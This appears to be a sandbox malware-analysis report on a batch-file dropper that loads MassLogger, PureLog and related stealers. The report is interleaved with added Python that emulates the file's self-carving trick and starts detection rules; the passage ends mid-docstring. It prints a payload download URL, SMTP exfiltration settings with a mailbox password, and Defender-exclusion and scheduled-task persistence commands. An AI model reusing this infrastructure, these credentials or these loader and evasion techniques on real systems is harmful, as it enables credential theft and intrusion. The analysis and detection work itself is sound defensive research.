Windows Analysis Report
PO#3_RKG367.bat

Overview

General Information

Sample name: PO#3_RKG367.bat
Analysis ID: 1586924
MD5: deaa9cb6ee189b95d1ad718df32dac56
SHA1: ba94e1e97609cfa1bd102fe1087fc714875c6c25
SHA256: 8f721d0dc987c60cb16a14ad166eab606b1b9401d6563241eb8ed359c24ad201
Tags: batuser-lowmal3

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Drops large PE files
Found large BAT file
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6192 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • findstr.exe (PID: 3416 cmdline: findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cscript.exe (PID: 800 cmdline: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • x.exe (PID: 5776 cmdline: C:\Users\user\AppData\Local\Temp\x.exe MD5: E337ECD5680D121D6DD649956DC716CA)
      • cmd.exe (PID: 6684 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rpkhzpuO.pif (PID: 1012 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
        • Trading_AIBot.exe (PID: 4064 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 528 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 5236 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 6064 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • apihost.exe (PID: 6804 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 10751439BD30D4B3066935F2DFFDC3C7)
        • Microsofts.exe (PID: 1664 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)
      • dllhost.exe (PID: 1012 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • Oupzhkpr.PIF (PID: 880 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: E337ECD5680D121D6DD649956DC716CA)
    • cmd.exe (PID: 6896 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rpkhzpuO.pif (PID: 5824 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Oupzhkpr.PIF (PID: 5160 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: E337ECD5680D121D6DD649956DC716CA)
    • cmd.exe (PID: 4816 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rpkhzpuO.pif (PID: 5280 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
{"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
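The process tree shows the first stage of the chain: cmd.exe runs `findstr /e "'v"` against the .bat itself and then `cscript //nologo ...\Temp\x.vbs`. `findstr /e` prints every line that ends with the search string, and in VBScript an apostrophe starts a comment, so lines tagged with a trailing `'v` can sit in the batch file as inert text and still execute unchanged once carved out. The following is an added example, not the sample's code and not part of the Joe Sandbox report; the redirect of findstr's output into x.vbs is inferred from the next process in the tree (the report does not show it), and FAKE_BAT is a constructed stand-in with an inert payload because the real file contents are not on the page.

```python
"""
Added example: emulate the `findstr /e "'v" <batch file>` carve stage seen in
the process tree, plus a small triage helper for other .bat files that use the
same trick. Not code from the report or from the sample.
"""
import re

# Constructed stand-in for the dropper layout (assumption: the real file is
# not on the page). `%~f0` expands to the batch file's own full path, which is
# why the report shows findstr invoked on the literal Desktop path, and
# `exit /b` stops cmd.exe before it ever reaches the VBS lines.
FAKE_BAT = r"""@echo off
findstr /e "'v" "%~f0" > "%TEMP%\x.vbs"
cscript //nologo "%TEMP%\x.vbs"
exit /b
Set fso = CreateObject("Scripting.FileSystemObject")'v
MsgBox "inert stand-in for the real payload"'v
"""

# Matches the simple `findstr /e "<marker>"` form used here; /c: and combined
# switch spellings are not handled.
FINDSTR_E = re.compile(r'findstr\s+/e\s+"([^"]+)"', re.IGNORECASE)


def findstr_end(text: str, marker: str) -> list[str]:
    """What `findstr /e "<marker>"` prints: every line ending in marker.
    /e anchors the search string at end of line; matching lines are printed
    verbatim, marker included."""
    return [line for line in text.splitlines() if line.endswith(marker)]


def carve_vbs(bat_text: str, marker: str = "'v") -> str:
    """Rebuild the x.vbs that redirecting findstr's output would produce."""
    return "\n".join(findstr_end(bat_text, marker)) + "\n"


def effective_vbs(vbs_text: str, marker: str = "'v") -> list[str]:
    """What cscript actually executes: the apostrophe in the trailing marker
    opens a VBScript comment, so the marker is dead text on every line."""
    return [line[:-len(marker)] for line in vbs_text.splitlines()
            if line.endswith(marker)]


def triage_markers(bat_text: str) -> dict[str, int]:
    """Triage helper for suspicious .bat files: find each `findstr /e "<x>"`
    self-carve marker and count the lines that carry it. An empty result
    means the file does not carve a payload out of itself this way."""
    return {m.group(1): len(findstr_end(bat_text, m.group(1)))
            for m in FINDSTR_E.finditer(bat_text)}


if __name__ == "__main__":
    print(carve_vbs(FAKE_BAT), end="")
    print(triage_markers(FAKE_BAT))
```

Because the findstr line itself does not end with the marker, it never ends up in the carved script; only the tagged lines do, which is why a static scan of the .bat for the marker count is a cheap first check before detonating it.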
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Microsofts.exe | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | strings below
  • 0x101cd:$a1: get_encryptedPassword
  • 0x10509:$a2: get_encryptedUsername
  • 0xff5a:$a3: get_timePasswordChanged
  • 0x1007b:$a4: get_passwordField
  • 0x101e3:$a5: set_encryptedPassword
  • 0x11bb3:$a7: get_logins
  • 0x11864:$a8: GetOutlookPasswords
  • 0x11642:$a9: StartKeylogger
  • 0x11b03:$a10: KeyLoggerEventArgs
  • 0x1169f:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\Microsofts.exe | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
Source | Rule | Description | Author | Strings
00000006.00000002.2536406675.000000007FAA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0000001D.00000002.2840097800.0000000000400000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings below
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000018.00000002.2745277954.0000000034B30000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(23 entries in total; remainder not shown)
Source | Rule | Description | Author | Strings
10.1.rpkhzpuO.pif.400000.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings below
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
24.2.rpkhzpuO.pif.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings below
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
24.2.rpkhzpuO.pif.31b93f56.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
24.2.rpkhzpuO.pif.343b0000.10.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
24.2.rpkhzpuO.pif.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings below
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
(49 entries in total; remainder not shown)

System Summary

Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5776, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: C:\Users\user\AppData\Local\Temp\x.exe, ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5776, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 1012, ProcessName: rpkhzpuO.pif
Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5776, TargetFilename: C:\Windows \SysWOW64\svchost.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Oupzhkpr.PIF" , ParentImage: C:\Users\Public\Libraries\Oupzhkpr.PIF, ParentProcessId: 880, ParentProcessName: Oupzhkpr.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 6896, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 528, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 800, ProcessName: cscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 800, ProcessName: cscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 800, ProcessName: cscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: C:\Users\user\AppData\Local\Temp\x.exe, ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5776, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 1012, ProcessName: rpkhzpuO.pif
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 528, ProcessName: powershell.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 4064, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6064, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6064, ProcessName: schtasks.exe
Source: Process started; Author: Michael Haag; Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 800, ProcessName: cscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 4064, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 528, ProcessName: powershell.exe
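The Sigma matches above are driven by four pieces of telemetry that recur throughout the report: a file written under `C:\Windows \SysWOW64` (note the space after `Windows`), a Run value pointing at `C:\Users\Public\Oupzhkpr.url`, `Add-MpPreference -ExclusionPath` from PowerShell, and `schtasks /create` whose action lives under `AppData\Roaming`. The following is an added example, not code from Joe Sandbox or from the SigmaHQ rules it cites: it re-implements those four detections as plain Python predicates and runs them over constructed Sysmon-style events (EventID 1 = process create, 11 = file create, 13 = registry value set) whose values are copied from the System Summary entries. The rule titles, the benign control event and the simplified matching logic are assumptions for this example.

```python
"""
Added example: minimal re-implementations of four Sigma detections that the
report lists, run over constructed Sysmon-style events. Not Joe Sandbox's or
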